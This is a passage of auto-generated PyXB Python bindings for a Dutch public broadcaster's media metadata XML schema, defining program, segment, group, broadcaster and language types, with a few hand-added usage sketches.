"""Complex type {urn:vpro:media:2009}countryType with content type SIMPLE"""
_TypeDefinition = pyxb.binding.datatypes.string
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_SIMPLE
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'countryType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1188, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.string
# Attribute code uses Python identifier code
__code = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'code'), 'code', '__urnvpromedia2009_countryType_code', _module_typeBindings.countryCodeType)
__code._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1191, 8)
__code._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1191, 8)
code = property(__code.value, __code.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__code.name() : __code
})
_module_typeBindings.countryType = countryType
Namespace.addCategoryObject('typeBinding', 'countryType', countryType)
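# Hand-written usage sketch: CT_SIMPLE again, so the display name is the text
# content and the country code goes in the 'code' attribute (values assumed):
#
#   c = countryType('Nederland', code='NL')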
# Complex type {urn:vpro:media:2009}languageType with content type SIMPLE
class languageType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}languageType with content type SIMPLE"""
_TypeDefinition = pyxb.binding.datatypes.string
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_SIMPLE
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'languageType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1208, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.string
# Attribute code uses Python identifier code
__code = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'code'), 'code', '__urnvpromedia2009_languageType_code', _module_typeBindings.languageCodeType)
__code._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1211, 8)
__code._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1211, 8)
code = property(__code.value, __code.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__code.name() : __code
})
_module_typeBindings.languageType = languageType
Namespace.addCategoryObject('typeBinding', 'languageType', languageType)
# Complex type {urn:vpro:media:2009}streamingStatus with content type EMPTY
class streamingStatus_ (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}streamingStatus with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'streamingStatus')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 3239, 3)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute withDrm uses Python identifier withDrm
__withDrm = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'withDrm'), 'withDrm', '__urnvpromedia2009_streamingStatus__withDrm', _module_typeBindings.streamingStatusValue)
__withDrm._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 3241, 4)
__withDrm._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 3241, 4)
withDrm = property(__withDrm.value, __withDrm.set, None, None)
# Attribute withoutDrm uses Python identifier withoutDrm
__withoutDrm = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'withoutDrm'), 'withoutDrm', '__urnvpromedia2009_streamingStatus__withoutDrm', _module_typeBindings.streamingStatusValue)
__withoutDrm._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 3242, 4)
__withoutDrm._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 3242, 4)
withoutDrm = property(__withoutDrm.value, __withoutDrm.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__withDrm.name() : __withDrm,
__withoutDrm.name() : __withoutDrm
})
_module_typeBindings.streamingStatus_ = streamingStatus_
Namespace.addCategoryObject('typeBinding', 'streamingStatus', streamingStatus_)
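# Hand-written usage sketch: the trailing underscore on streamingStatus_ is
# presumably PyXB avoiding a name clash with the 'streamingStatus' element
# binding. Both attributes take streamingStatusValue literals; 'ONLINE' and
# 'OFFLINE' are assumed members:
#
#   s = streamingStatus_(withDrm='ONLINE', withoutDrm='OFFLINE')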
# Complex type {urn:vpro:media:2009}programType with content type ELEMENT_ONLY
class programType (baseMediaType):
"""Complex type {urn:vpro:media:2009}programType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'programType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 87, 2)
_ElementMap = baseMediaType._ElementMap.copy()
_AttributeMap = baseMediaType._AttributeMap.copy()
# Base type is baseMediaType
# Element {urn:vpro:media:2009}scheduleEvents uses Python identifier scheduleEvents
__scheduleEvents = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'scheduleEvents'), 'scheduleEvents', '__urnvpromedia2009_programType_urnvpromedia2009scheduleEvents', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 91, 10), )
scheduleEvents = property(__scheduleEvents.value, __scheduleEvents.set, None, None)
# Element {urn:vpro:media:2009}episodeOf uses Python identifier episodeOf
__episodeOf = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'episodeOf'), 'episodeOf', '__urnvpromedia2009_programType_urnvpromedia2009episodeOf', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 92, 10), )
episodeOf = property(__episodeOf.value, __episodeOf.set, None, "\n A program (only if its type is 'BROADCAST') can be an episode of a group of type 'SERIES' or 'SEASON'.\n ")
# Element {urn:vpro:media:2009}segments uses Python identifier segments
__segments = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'segments'), 'segments', '__urnvpromedia2009_programType_urnvpromedia2009segments', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 99, 10), )
segments = property(__segments.value, __segments.set, None, None)
# Element crid ({urn:vpro:media:2009}crid) inherited from {urn:vpro:media:2009}baseMediaType
# Element broadcaster ({urn:vpro:media:2009}broadcaster) inherited from {urn:vpro:media:2009}baseMediaType
# Element portal ({urn:vpro:media:2009}portal) inherited from {urn:vpro:media:2009}baseMediaType
# Element exclusive ({urn:vpro:media:2009}exclusive) inherited from {urn:vpro:media:2009}baseMediaType
# Element region ({urn:vpro:media:2009}region) inherited from {urn:vpro:media:2009}baseMediaType
# Element title ({urn:vpro:media:2009}title) inherited from {urn:vpro:media:2009}baseMediaType
# Element description ({urn:vpro:media:2009}description) inherited from {urn:vpro:media:2009}baseMediaType
# Element genre ({urn:vpro:media:2009}genre) inherited from {urn:vpro:media:2009}baseMediaType
# Element tag ({urn:vpro:media:2009}tag) inherited from {urn:vpro:media:2009}baseMediaType
# Element intentions ({urn:vpro:media:2009}intentions) inherited from {urn:vpro:media:2009}baseMediaType
# Element targetGroups ({urn:vpro:media:2009}targetGroups) inherited from {urn:vpro:media:2009}baseMediaType
# Element geoLocations ({urn:vpro:media:2009}geoLocations) inherited from {urn:vpro:media:2009}baseMediaType
# Element topics ({urn:vpro:media:2009}topics) inherited from {urn:vpro:media:2009}baseMediaType
# Element source ({urn:vpro:media:2009}source) inherited from {urn:vpro:media:2009}baseMediaType
# Element country ({urn:vpro:media:2009}country) inherited from {urn:vpro:media:2009}baseMediaType
# Element language ({urn:vpro:media:2009}language) inherited from {urn:vpro:media:2009}baseMediaType
# Element isDubbed ({urn:vpro:media:2009}isDubbed) inherited from {urn:vpro:media:2009}baseMediaType
# Element availableSubtitles ({urn:vpro:media:2009}availableSubtitles) inherited from {urn:vpro:media:2009}baseMediaType
# Element avAttributes ({urn:vpro:media:2009}avAttributes) inherited from {urn:vpro:media:2009}baseMediaType
# Element releaseYear ({urn:vpro:media:2009}releaseYear) inherited from {urn:vpro:media:2009}baseMediaType
# Element duration ({urn:vpro:media:2009}duration) inherited from {urn:vpro:media:2009}baseMediaType
# Element credits ({urn:vpro:media:2009}credits) inherited from {urn:vpro:media:2009}baseMediaType
# Element award ({urn:vpro:media:2009}award) inherited from {urn:vpro:media:2009}baseMediaType
# Element descendantOf ({urn:vpro:media:2009}descendantOf) inherited from {urn:vpro:media:2009}baseMediaType
# Element memberOf ({urn:vpro:media:2009}memberOf) inherited from {urn:vpro:media:2009}baseMediaType
# Element ageRating ({urn:vpro:media:2009}ageRating) inherited from {urn:vpro:media:2009}baseMediaType
# Element contentRating ({urn:vpro:media:2009}contentRating) inherited from {urn:vpro:media:2009}baseMediaType
# Element email ({urn:vpro:media:2009}email) inherited from {urn:vpro:media:2009}baseMediaType
# Element website ({urn:vpro:media:2009}website) inherited from {urn:vpro:media:2009}baseMediaType
# Element twitter ({urn:vpro:media:2009}twitter) inherited from {urn:vpro:media:2009}baseMediaType
# Element teletext ({urn:vpro:media:2009}teletext) inherited from {urn:vpro:media:2009}baseMediaType
# Element prediction ({urn:vpro:media:2009}prediction) inherited from {urn:vpro:media:2009}baseMediaType
# Element locations ({urn:vpro:media:2009}locations) inherited from {urn:vpro:media:2009}baseMediaType
# Element relation ({urn:vpro:media:2009}relation) inherited from {urn:vpro:media:2009}baseMediaType
# Element images ({urn:vpro:media:2009}images) inherited from {urn:vpro:media:2009}baseMediaType
# Attribute type uses Python identifier type
__type = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'type'), 'type', '__urnvpromedia2009_programType_type', _module_typeBindings.programTypeEnum, required=True)
__type._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 107, 8)
__type._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 107, 8)
type = property(__type.value, __type.set, None, '\n The type of this program (e.g. BROADCAST, TRACK, CLIP)\n ')
# Attribute mid inherited from {urn:vpro:media:2009}baseMediaType
# Attribute avType inherited from {urn:vpro:media:2009}baseMediaType
# Attribute sortDate inherited from {urn:vpro:media:2009}baseMediaType
# Attribute embeddable inherited from {urn:vpro:media:2009}baseMediaType
# Attribute hasSubtitles inherited from {urn:vpro:media:2009}baseMediaType
# Attribute mergedTo inherited from {urn:vpro:media:2009}baseMediaType
# Attribute urn inherited from {urn:vpro:media:2009}baseMediaType
# Attribute publishStart inherited from {urn:vpro:media:2009}baseMediaType
# Attribute publishStop inherited from {urn:vpro:media:2009}baseMediaType
# Attribute publishDate inherited from {urn:vpro:media:2009}baseMediaType
# Attribute creationDate inherited from {urn:vpro:media:2009}baseMediaType
# Attribute lastModified inherited from {urn:vpro:media:2009}baseMediaType
# Attribute workflow inherited from {urn:vpro:media:2009}baseMediaType
_ElementMap.update({
__scheduleEvents.name() : __scheduleEvents,
__episodeOf.name() : __episodeOf,
__segments.name() : __segments
})
_AttributeMap.update({
__type.name() : __type
})
_module_typeBindings.programType = programType
Namespace.addCategoryObject('typeBinding', 'programType', programType)
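# ---------------------------------------------------------------------------
# Hand-added usage sketch (not part of the PyXB-generated bindings): shows how
# a programType instance is typically populated. The value 'BROADCAST' comes
# from the schema documentation of the 'type' attribute; everything else here
# is an invented example. The function is never called at import time.
def _programType_usage_sketch():
    prog = programType()
    prog.type = 'BROADCAST'   # required attribute, validated against programTypeEnum
    return prog
# ---------------------------------------------------------------------------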
# Complex type {urn:vpro:media:2009}broadcasterType with content type SIMPLE
class broadcasterType (organizationType):
"""Complex type {urn:vpro:media:2009}broadcasterType with content type SIMPLE"""
_TypeDefinition = pyxb.binding.datatypes.string
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_SIMPLE
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'broadcasterType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 441, 2)
_ElementMap = organizationType._ElementMap.copy()
_AttributeMap = organizationType._AttributeMap.copy()
# Base type is organizationType
# Attribute id inherited from {urn:vpro:media:2009}organizationType
_ElementMap.update({
})
_AttributeMap.update({
})
_module_typeBindings.broadcasterType = broadcasterType
Namespace.addCategoryObject('typeBinding', 'broadcasterType', broadcasterType)
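# Hand-added usage sketch (not generated): broadcasterType has simple string
# content plus the 'id' attribute inherited from organizationType. Passing the
# attribute as a keyword follows the usual PyXB constructor convention; the
# values are invented examples. Never called at import time.
def _broadcasterType_usage_sketch():
    return broadcasterType('VPRO', id='VPRO')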
# Complex type {urn:vpro:media:2009}segmentType with content type ELEMENT_ONLY
class segmentType (baseMediaType):
"""Complex type {urn:vpro:media:2009}segmentType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'segmentType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 629, 2)
_ElementMap = baseMediaType._ElementMap.copy()
_AttributeMap = baseMediaType._AttributeMap.copy()
# Base type is baseMediaType
# Element crid ({urn:vpro:media:2009}crid) inherited from {urn:vpro:media:2009}baseMediaType
# Element broadcaster ({urn:vpro:media:2009}broadcaster) inherited from {urn:vpro:media:2009}baseMediaType
# Element portal ({urn:vpro:media:2009}portal) inherited from {urn:vpro:media:2009}baseMediaType
# Element exclusive ({urn:vpro:media:2009}exclusive) inherited from {urn:vpro:media:2009}baseMediaType
# Element region ({urn:vpro:media:2009}region) inherited from {urn:vpro:media:2009}baseMediaType
# Element title ({urn:vpro:media:2009}title) inherited from {urn:vpro:media:2009}baseMediaType
# Element description ({urn:vpro:media:2009}description) inherited from {urn:vpro:media:2009}baseMediaType
# Element genre ({urn:vpro:media:2009}genre) inherited from {urn:vpro:media:2009}baseMediaType
# Element tag ({urn:vpro:media:2009}tag) inherited from {urn:vpro:media:2009}baseMediaType
# Element intentions ({urn:vpro:media:2009}intentions) inherited from {urn:vpro:media:2009}baseMediaType
# Element targetGroups ({urn:vpro:media:2009}targetGroups) inherited from {urn:vpro:media:2009}baseMediaType
# Element geoLocations ({urn:vpro:media:2009}geoLocations) inherited from {urn:vpro:media:2009}baseMediaType
# Element topics ({urn:vpro:media:2009}topics) inherited from {urn:vpro:media:2009}baseMediaType
# Element source ({urn:vpro:media:2009}source) inherited from {urn:vpro:media:2009}baseMediaType
# Element country ({urn:vpro:media:2009}country) inherited from {urn:vpro:media:2009}baseMediaType
# Element language ({urn:vpro:media:2009}language) inherited from {urn:vpro:media:2009}baseMediaType
# Element isDubbed ({urn:vpro:media:2009}isDubbed) inherited from {urn:vpro:media:2009}baseMediaType
# Element availableSubtitles ({urn:vpro:media:2009}availableSubtitles) inherited from {urn:vpro:media:2009}baseMediaType
# Element avAttributes ({urn:vpro:media:2009}avAttributes) inherited from {urn:vpro:media:2009}baseMediaType
# Element releaseYear ({urn:vpro:media:2009}releaseYear) inherited from {urn:vpro:media:2009}baseMediaType
# Element duration ({urn:vpro:media:2009}duration) inherited from {urn:vpro:media:2009}baseMediaType
# Element credits ({urn:vpro:media:2009}credits) inherited from {urn:vpro:media:2009}baseMediaType
# Element award ({urn:vpro:media:2009}award) inherited from {urn:vpro:media:2009}baseMediaType
# Element descendantOf ({urn:vpro:media:2009}descendantOf) inherited from {urn:vpro:media:2009}baseMediaType
# Element memberOf ({urn:vpro:media:2009}memberOf) inherited from {urn:vpro:media:2009}baseMediaType
# Element ageRating ({urn:vpro:media:2009}ageRating) inherited from {urn:vpro:media:2009}baseMediaType
# Element contentRating ({urn:vpro:media:2009}contentRating) inherited from {urn:vpro:media:2009}baseMediaType
# Element email ({urn:vpro:media:2009}email) inherited from {urn:vpro:media:2009}baseMediaType
# Element website ({urn:vpro:media:2009}website) inherited from {urn:vpro:media:2009}baseMediaType
# Element twitter ({urn:vpro:media:2009}twitter) inherited from {urn:vpro:media:2009}baseMediaType
# Element teletext ({urn:vpro:media:2009}teletext) inherited from {urn:vpro:media:2009}baseMediaType
# Element prediction ({urn:vpro:media:2009}prediction) inherited from {urn:vpro:media:2009}baseMediaType
# Element locations ({urn:vpro:media:2009}locations) inherited from {urn:vpro:media:2009}baseMediaType
# Element relation ({urn:vpro:media:2009}relation) inherited from {urn:vpro:media:2009}baseMediaType
# Element images ({urn:vpro:media:2009}images) inherited from {urn:vpro:media:2009}baseMediaType
# Element {urn:vpro:media:2009}segmentOf uses Python identifier segmentOf
__segmentOf = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'segmentOf'), 'segmentOf', '__urnvpromedia2009_segmentType_urnvpromedia2009segmentOf', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 633, 10), )
segmentOf = property(__segmentOf.value, __segmentOf.set, None, None)
# Element {urn:vpro:media:2009}start uses Python identifier start
__start = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'start'), 'start', '__urnvpromedia2009_segmentType_urnvpromedia2009start', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 634, 10), )
start = property(__start.value, __start.set, None, None)
# Attribute mid inherited from {urn:vpro:media:2009}baseMediaType
# Attribute avType inherited from {urn:vpro:media:2009}baseMediaType
# Attribute sortDate inherited from {urn:vpro:media:2009}baseMediaType
# Attribute embeddable inherited from {urn:vpro:media:2009}baseMediaType
# Attribute hasSubtitles inherited from {urn:vpro:media:2009}baseMediaType
# Attribute mergedTo inherited from {urn:vpro:media:2009}baseMediaType
# Attribute midRef uses Python identifier midRef
__midRef = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'midRef'), 'midRef', '__urnvpromedia2009_segmentType_midRef', _module_typeBindings.midType, required=True)
__midRef._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 636, 8)
__midRef._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 636, 8)
midRef = property(__midRef.value, __midRef.set, None, None)
# Attribute urnRef uses Python identifier urnRef
__urnRef = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'urnRef'), 'urnRef', '__urnvpromedia2009_segmentType_urnRef', pyxb.binding.datatypes.anyURI, required=True)
__urnRef._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 637, 8)
__urnRef._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 637, 8)
urnRef = property(__urnRef.value, __urnRef.set, None, None)
# Attribute type uses Python identifier type
__type = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'type'), 'type', '__urnvpromedia2009_segmentType_type', _module_typeBindings.segmentTypeEnum, required=True)
__type._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 638, 8)
__type._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 638, 8)
type = property(__type.value, __type.set, None, None)
# Attribute urn inherited from {urn:vpro:media:2009}baseMediaType
# Attribute publishStart inherited from {urn:vpro:media:2009}baseMediaType
# Attribute publishStop inherited from {urn:vpro:media:2009}baseMediaType
# Attribute publishDate inherited from {urn:vpro:media:2009}baseMediaType
# Attribute creationDate inherited from {urn:vpro:media:2009}baseMediaType
# Attribute lastModified inherited from {urn:vpro:media:2009}baseMediaType
# Attribute workflow inherited from {urn:vpro:media:2009}baseMediaType
_ElementMap.update({
__segmentOf.name() : __segmentOf,
__start.name() : __start
})
_AttributeMap.update({
__midRef.name() : __midRef,
__urnRef.name() : __urnRef,
__type.name() : __type
})
_module_typeBindings.segmentType = segmentType
Namespace.addCategoryObject('typeBinding', 'segmentType', segmentType)
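# Hand-added usage sketch (not generated): a segment references its parent
# program through the required midRef/urnRef/type attributes. All values are
# invented examples; 'SEGMENT' is an assumed member of segmentTypeEnum and
# the start element is assumed to be an xs:duration. Never called at import.
def _segmentType_usage_sketch():
    seg = segmentType()
    seg.midRef = 'VPWON_12345'                            # mid of the parent program (midType)
    seg.urnRef = 'urn:vpro:media:program:12345'           # urn of the parent program (anyURI)
    seg.type = 'SEGMENT'                                  # assumed segmentTypeEnum value
    seg.start = pyxb.binding.datatypes.duration('PT0S')   # offset within the parent program
    return seg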
# Complex type {urn:vpro:media:2009}groupType with content type ELEMENT_ONLY
class groupType (baseMediaType):
"""Complex type {urn:vpro:media:2009}groupType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'groupType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 837, 2)
_ElementMap = baseMediaType._ElementMap.copy()
_AttributeMap = baseMediaType._AttributeMap.copy()
# Base type is baseMediaType
# Element crid ({urn:vpro:media:2009}crid) inherited from {urn:vpro:media:2009}baseMediaType
# Element broadcaster ({urn:vpro:media:2009}broadcaster) inherited from {urn:vpro:media:2009}baseMediaType
# Element portal ({urn:vpro:media:2009}portal) inherited from {urn:vpro:media:2009}baseMediaType
# Element exclusive ({urn:vpro:media:2009}exclusive) inherited from {urn:vpro:media:2009}baseMediaType
# Element region ({urn:vpro:media:2009}region) inherited from {urn:vpro:media:2009}baseMediaType
# Element title ({urn:vpro:media:2009}title) inherited from {urn:vpro:media:2009}baseMediaType
# Element description ({urn:vpro:media:2009}description) inherited from {urn:vpro:media:2009}baseMediaType
# Element genre ({urn:vpro:media:2009}genre) inherited from {urn:vpro:media:2009}baseMediaType
# Element tag ({urn:vpro:media:2009}tag) inherited from {urn:vpro:media:2009}baseMediaType
# Element intentions ({urn:vpro:media:2009}intentions) inherited from {urn:vpro:media:2009}baseMediaType
# Element targetGroups ({urn:vpro:media:2009}targetGroups) inherited from {urn:vpro:media:2009}baseMediaType
# Element geoLocations ({urn:vpro:media:2009}geoLocations) inherited from {urn:vpro:media:2009}baseMediaType
# Element topics ({urn:vpro:media:2009}topics) inherited from {urn:vpro:media:2009}baseMediaType
# Element source ({urn:vpro:media:2009}source) inherited from {urn:vpro:media:2009}baseMediaType
# Element country ({urn:vpro:media:2009}country) inherited from {urn:vpro:media:2009}baseMediaType
# Element language ({urn:vpro:media:2009}language) inherited from {urn:vpro:media:2009}baseMediaType
# Element isDubbed ({urn:vpro:media:2009}isDubbed) inherited from {urn:vpro:media:2009}baseMediaType
# Element availableSubtitles ({urn:vpro:media:2009}availableSubtitles) inherited from {urn:vpro:media:2009}baseMediaType
# Element avAttributes ({urn:vpro:media:2009}avAttributes) inherited from {urn:vpro:media:2009}baseMediaType
# Element releaseYear ({urn:vpro:media:2009}releaseYear) inherited from {urn:vpro:media:2009}baseMediaType
# Element duration ({urn:vpro:media:2009}duration) inherited from {urn:vpro:media:2009}baseMediaType
# Element credits ({urn:vpro:media:2009}credits) inherited from {urn:vpro:media:2009}baseMediaType
# Element award ({urn:vpro:media:2009}award) inherited from {urn:vpro:media:2009}baseMediaType
# Element descendantOf ({urn:vpro:media:2009}descendantOf) inherited from {urn:vpro:media:2009}baseMediaType
# Element memberOf ({urn:vpro:media:2009}memberOf) inherited from {urn:vpro:media:2009}baseMediaType
# Element ageRating ({urn:vpro:media:2009}ageRating) inherited from {urn:vpro:media:2009}baseMediaType
# Element contentRating ({urn:vpro:media:2009}contentRating) inherited from {urn:vpro:media:2009}baseMediaType
# Element email ({urn:vpro:media:2009}email) inherited from {urn:vpro:media:2009}baseMediaType
# Element website ({urn:vpro:media:2009}website) inherited from {urn:vpro:media:2009}baseMediaType
# Element twitter ({urn:vpro:media:2009}twitter) inherited from {urn:vpro:media:2009}baseMediaType
# Element teletext ({urn:vpro:media:2009}teletext) inherited from {urn:vpro:media:2009}baseMediaType
# Element prediction ({urn:vpro:media:2009}prediction) inherited from {urn:vpro:media:2009}baseMediaType
# Element locations ({urn:vpro:media:2009}locations) inherited from {urn:vpro:media:2009}baseMediaType
# Element relation ({urn:vpro:media:2009}relation) inherited from {urn:vpro:media:2009}baseMediaType
# Element images ({urn:vpro:media:2009}images) inherited from {urn:vpro:media:2009}baseMediaType
# Element {urn:vpro:media:2009}poSeriesID uses Python identifier poSeriesID
__poSeriesID = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'poSeriesID'), 'poSeriesID', '__urnvpromedia2009_groupType_urnvpromedia2009poSeriesID', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 841, 10), )
poSeriesID = property(__poSeriesID.value, __poSeriesID.set, None, None)
# Attribute mid inherited from {urn:vpro:media:2009}baseMediaType
# Attribute avType inherited from {urn:vpro:media:2009}baseMediaType
# Attribute sortDate inherited from {urn:vpro:media:2009}baseMediaType
# Attribute embeddable inherited from {urn:vpro:media:2009}baseMediaType
# Attribute hasSubtitles inherited from {urn:vpro:media:2009}baseMediaType
# Attribute mergedTo inherited from {urn:vpro:media:2009}baseMediaType
# Attribute isOrdered uses Python identifier isOrdered
__isOrdered = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'isOrdered'), 'isOrdered', '__urnvpromedia2009_groupType_isOrdered', pyxb.binding.datatypes.boolean, required=True)
__isOrdered._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 843, 8)
__isOrdered._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 843, 8)
isOrdered = property(__isOrdered.value, __isOrdered.set, None, None)
# Attribute type uses Python identifier type
__type = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'type'), 'type', '__urnvpromedia2009_groupType_type', _module_typeBindings.groupTypeEnum, required=True)
__type._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 844, 8)
__type._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 844, 8)
type = property(__type.value, __type.set, None, None)
# Attribute defaultElement uses Python identifier defaultElement
__defaultElement = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'defaultElement'), 'defaultElement', '__urnvpromedia2009_groupType_defaultElement', pyxb.binding.datatypes.long)
__defaultElement._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 845, 8)
__defaultElement._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 845, 8)
defaultElement = property(__defaultElement.value, __defaultElement.set, None, None)
# Attribute urn inherited from {urn:vpro:media:2009}baseMediaType
# Attribute publishStart inherited from {urn:vpro:media:2009}baseMediaType
# Attribute publishStop inherited from {urn:vpro:media:2009}baseMediaType
# Attribute publishDate inherited from {urn:vpro:media:2009}baseMediaType
# Attribute creationDate inherited from {urn:vpro:media:2009}baseMediaType
# Attribute lastModified inherited from {urn:vpro:media:2009}baseMediaType
# Attribute workflow inherited from {urn:vpro:media:2009}baseMediaType
_ElementMap.update({
__poSeriesID.name() : __poSeriesID
})
_AttributeMap.update({
__isOrdered.name() : __isOrdered,
__type.name() : __type,
__defaultElement.name() : __defaultElement
})
_module_typeBindings.groupType = groupType
Namespace.addCategoryObject('typeBinding', 'groupType', groupType)
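# Hand-added usage sketch (not generated): groups collect programs and/or
# other groups. 'SERIES' is taken from the schema documentation of episodeOf
# (groups of type 'SERIES' or 'SEASON'); isOrdered is the required boolean
# attribute declared above. Never called at import time.
def _groupType_usage_sketch():
    grp = groupType()
    grp.type = 'SERIES'    # required groupTypeEnum value (assumed member)
    grp.isOrdered = True   # required attribute
    return grp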
mediaInformation = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'mediaInformation'), mediaTableType, documentation='\n Base element only used when programs, groups and schedule information need to be bundled in one XML. E.g. when distributing to cable companies.\n ', location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 18, 2))
Namespace.addCategoryObject('elementBinding', mediaInformation.name().localName(), mediaInformation)
schedule = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'schedule'), scheduleType, documentation="\n Programs of type 'BROADCAST' can contain schedule events. A schedule indicates on which channel and at what time the program is broadcast. A schedule is a container which contains the schedule events of different programs, for a certain period of time.\n ", location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 46, 2))
Namespace.addCategoryObject('elementBinding', schedule.name().localName(), schedule)
streamingStatus = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'streamingStatus'), streamingStatus_, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 54, 4))
Namespace.addCategoryObject('elementBinding', streamingStatus.name().localName(), streamingStatus)
